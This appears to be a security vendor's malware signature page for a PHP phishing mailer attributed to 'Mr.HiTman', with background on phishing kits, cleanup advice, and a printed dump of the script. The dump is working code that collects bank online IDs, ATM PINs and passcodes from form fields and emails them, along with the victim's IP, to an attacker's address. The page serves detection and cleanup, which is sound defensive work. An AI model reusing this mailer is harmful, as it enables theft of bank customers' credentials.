Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.phishing.hitman.001

php.phishing.hitman.001

Phishing is a way to illegally acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication (web site, email, etc). Those fake websites are hosted on compromised sites without the owner's permission and are sent to the victims using mailing scripts, hosted or not in the same server where the phishing page is.
Phishing pages are often complex and rely on several files to run. They will be hosted on a specific directory ressembling the phishing target.
PHP phishing tools are malware accomplices which are mostly used to send the captured credentials and perform the last actions, like redirecting to the correct page or even closing the browser window.
Created by a hacker named Mr.HiTman, this tool was found in several phishing sites that were targeting banks. It sends all the personal information captured by the phishing pages created and sends to an e-mail address.

Affecting

Any website running vulnerable software or hosted on a server with compromised access credentials

Cleanup

Inspect your site's files and directories for strange names or names that ressemble other sites than yours and delete them.
Reviewing your site's access logs to find unusual POST requests is a good way to find if your site is infected and where the malicious code is being hosted

Dump


<?php
$ip = getenv("REMOTE_ADDR");
$message .= "-----------------------Account Info------------------------------------
";
$message .= "Account Open In: ".$_POST['accountstate']."
";
$message .= "Online ID: ".$_POST['onlineid']."
";
$message .= "ATM or Check Card PIN: ".$_POST['atmcheckcardpin']."
";
$message .= "Passcode: ".$_POST['passcode']."
";
$messege .= "host";
$message .= "---------------Created BY Mr.HiTman------------------------------
";
$amon = "[email protected]";

$subject = "BOA RESULTAT $ip";$headers = "From: HiTman<[email protected]>";$headers .= $_POST['eMailAdd']."
";$headers .= "MIME-Version: 1.0
";$arr=array($amon, $IP);foreach ($arr as $amon);

mail($amon,$subject,$message,$headers);